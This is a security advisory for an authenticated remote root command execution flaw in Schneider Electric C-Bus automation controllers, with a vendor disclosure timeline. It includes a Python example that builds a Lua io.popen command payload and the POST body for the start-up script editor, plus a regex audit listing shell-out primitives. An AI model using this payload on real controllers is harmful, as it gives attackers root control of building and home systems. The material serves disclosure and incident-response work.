Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit

High
Advisory ID
ZSL-2022-5707
Release Date
29 May 2022
Vendor
Schneider Electric SE - https://www.se.com
Affected Version
CLIPSAL 5500SHAC (i.MX28), CLIPSAL 5500NAC (i.MX28), SW: 1.10.0, 1.6.0, HW: 1.0, Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2, SpaceLogic C-Bus
CVE
N/A
Tested On
CPU model: ARM926EJ-S rev 5 (v5l), GNU/Linux 4.4.115 (armv5tejl), LuaJIT 2.0.5, FlashSYS v2, nginx
Summary

The C-Bus Network Automation Controller (5500NAC) and the Wiser for C-Bus Automation Controller (5500SHAC) are advanced controllers from Schneider Electric. They are specifically designed to unite the C-Bus home automation solution with common household communication protocols, covering lighting and climate control, security, entertainment and energy metering. The Wiser for C-Bus Automation Controller manages and controls C-Bus systems for residential homes or zones within a building and integrates functions such as heating/cooling, energy/load monitoring and remote control for C-Bus and Modbus.

Description

The automation controller suffers from an authenticated arbitrary command execution vulnerability. An attacker holding valid (administrator) credentials can abuse the Start-up (init) script editor and exploit the 'script' POST parameter to insert malicious Lua script code, which the controller executes with root privileges and which therefore grants full control of the device. Because the script is stored as a start-up script, the code also survives reboots.
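The advisory's own PoC is not reproduced on this page. The following is an added example, not the ZSL PoC and not Schneider Electric code, that models the vector the description names from both sides: building the Lua start-up script an attacker would push through the editor's 'script' POST parameter, and auditing start-up scripts exported from a controller for shell-out primitives during incident response. Only the 'script' parameter, the /scada-main/scripting/ editor and the root execution context come from the advisory; the save path, the companion form field, the sample scripts and the Lua API calls flagged (standard Lua, not FlashSYS-specific) are assumptions or constructed inputs.

```python
"""Added example for ZSL-2022-5707; not the advisory's PoC.

Only 'script' (POST parameter), '/scada-main/scripting/' (editor) and the
root execution context are taken from the advisory text. Everything else
below is an assumption or a constructed sample.
"""
import re
from urllib.parse import urlencode, parse_qs

# Assumed save endpoint under the editor named in the advisory; the exact
# path the editor POSTs to is not stated on the page.
EDITOR_PATH = "/scada-main/scripting/"


def lua_command_payload(cmd: str) -> str:
    """Lua start-up script that runs `cmd` with the privileges of the script
    host (root, per the advisory) and returns its output.

    Uses plain Lua io.popen so the script has no FlashSYS dependencies."""
    escaped = cmd.replace("\\", "\\\\").replace('"', '\\"')
    return (
        "-- constructed payload, not from the original advisory\n"
        f'local p = io.popen("{escaped} 2>&1")\n'
        'local out = p:read("*a")\n'
        "p:close()\n"
        "return out\n"
    )


def form_body(script: str, name: str = "init") -> str:
    """urlencoded POST body for the editor. 'script' is the parameter the
    advisory names; 'name' is an assumed companion field."""
    return urlencode({"name": name, "script": script})


# Lua primitives that let a stored script reach the OS or load more code.
# A start-up script on a home-automation controller has no business calling
# these, so each hit is worth a look. Commented-out calls are flagged on
# purpose: during IR the analyst wants to see them too.
SHELL_OUT = re.compile(
    r"\b(os\.execute|io\.popen|os\.remove|os\.rename|os\.exit"
    r"|loadstring|load|dofile|require\s*\(\s*['\"]socket)\s*\(?"
)


def audit_script(text: str) -> list[tuple[int, str]]:
    """Return (line number, primitive) for every suspicious call in a Lua
    script pulled off the controller."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SHELL_OUT.search(line)
        if m:
            hits.append((lineno, m.group(1)))
    return hits


if __name__ == "__main__":
    payload = lua_command_payload("id")
    body = form_body(payload)
    print(f"POST {EDITOR_PATH}  ({len(body)} bytes, urlencoded)")
    print("script parameter round-trips:",
          parse_qs(body)["script"][0] == payload)
    print("audit hits:", audit_script(payload))
```

Run it as-is to see the shape of the request and the audit output; to use the audit side for real, feed `audit_script` the text of each start-up script exported from a controller and treat any hit as evidence to triage, since the vendor considers this behaviour a feature and will not patch it.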

Proof of Concept
Disclosure Timeline
12.03.2022 Vulnerability discovered.
15.03.2022 Sent details to vendor.
17.03.2022 Vendor creates case SE-6201, starts investigation.
25.03.2022 Asked vendor for status update.
26.03.2022 Vendor responds, assessment is still ongoing.
30.03.2022 Vendor cannot reproduce with provided info, requests proof of execution.
31.03.2022 Sent encrypted PoC script to the vendor.
31.03.2022 Vendor receives PoC, starts analysis.
11.04.2022 Asked vendor for confirmation and status update.
11.04.2022 Vendor is still analyzing the vulnerability. Will let us know once the case is confirmed.
20.04.2022 Asked vendor for confirmation and scheduled patch release date.
21.04.2022 Vendor confirms SE-6201, working on action plan.
22.04.2022 Vendor responds: The product team has not accepted this report as a valid vulnerability due to the following analysis: The python script mentioned in the report uses the /scada-main/scripting/ editor to execute the lua script to gain remote access to the controller. However, to achieve this, the attacker needs to provide the administrator credentials to execute the script. So, this can be done only when the attacker has the administrator credentials with him. In order to prevent attackers from obtaining administrator credentials, the product implements the following measures to make passwords difficult to brute force: force a user to change the default password the very first time they log in to the controller; use of a strong password (combination of characters with uppercase letter, lowercase letter and digit); block access to the controller after a certain number of wrong login attempts.
22.04.2022 Replied to the vendor. Asked vendor to assign SeeVeeE.
30.04.2022 Asked vendor for status update.
02.05.2022 Vendor closes SE-6201 (not a vuln).
29.05.2022 Public security advisory released.
Credits
Vulnerability discovered by Gjoko Krstic
References
Changelog
29.05.2022 Initial release
31.05.2022 Added reference [1], [2] and [3]
07.06.2022 Added reference [4]